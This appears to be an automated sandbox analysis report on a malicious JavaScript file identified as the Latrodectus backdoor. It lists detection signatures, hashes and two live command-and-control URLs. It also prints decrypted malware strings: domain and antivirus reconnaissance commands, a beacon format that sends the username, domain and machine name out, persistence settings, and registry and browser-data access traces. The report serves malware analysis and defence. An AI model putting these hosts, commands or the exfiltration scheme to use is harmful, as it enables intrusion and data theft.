Windows Analysis Report
Document_a51_19i793302-14b09981a5569-3684u8.js

Overview

General Information

Sample name: Document_a51_19i793302-14b09981a5569-3684u8.js
Analysis ID: 1432364
MD5: b5c04c9ce0a3da2e16e97632e13b5e28
SHA1: 00303f1b540e92a79488fd9b603c5e987cee3734
SHA256: 71a429fdbaa04f8eee80c05b123ba00635569801ca041fdc7c6ac41de8aa72d3
Tags: js
Infos:

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Unidentified 111 (Latrodectus), Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection
barindex
Found malware configuration
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Multi AV Scanner detection for dropped file
Source: :wtfbbq (copy) ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\sharepoint\360total.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: Document_a51_19i793302-14b09981a5569-3684u8.js ReversingLabs: Detection: 18%
Sample uses string decryption to hide its real strings
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c ipconfig /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c systeminfo
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c nltest /domain_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net view /all /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net view /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &ipconfig=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net config workstation
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c whoami /groups
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &systeminfo=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain_trusts=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain_trusts_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_view_all_domain=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_view_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &wmic=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_config_ws=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_wmic_av=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &whoami_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &proclist=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &desklinks=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: *.*
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Update_%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Custom_update
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Updater
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: rundll32.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s", %s %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: runnung
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: :wtfbbq
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: files/bp.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s\%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %d.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s\%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: init -zzzz="%s\%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: front
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /files/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Facial
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: !"$%&()*wp
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: POST
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: GET
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: curl/7.88.1
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: URLS
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: COMMAND
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: ERROR
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: <html>
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: <!DOCTYPE
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: 12345
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &stiller=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%d.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: LogonTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %x%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: TimeTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: PT0H%02dM
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &mac=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: :%02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: PT0S
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &computername=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \*.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \Registry\Machine\
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: https://jarinamaers.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: https://startmast.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Desktop
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Startup
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Personal
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Local AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \update_data.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: URLS|%d|%s
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 5_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010315E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor, 6_3_0000018010315E5C
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr

Spreading
barindex
Performs a network lookup / discovery via net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA, 6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW, 6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_000001EF532B1A08
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\ Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
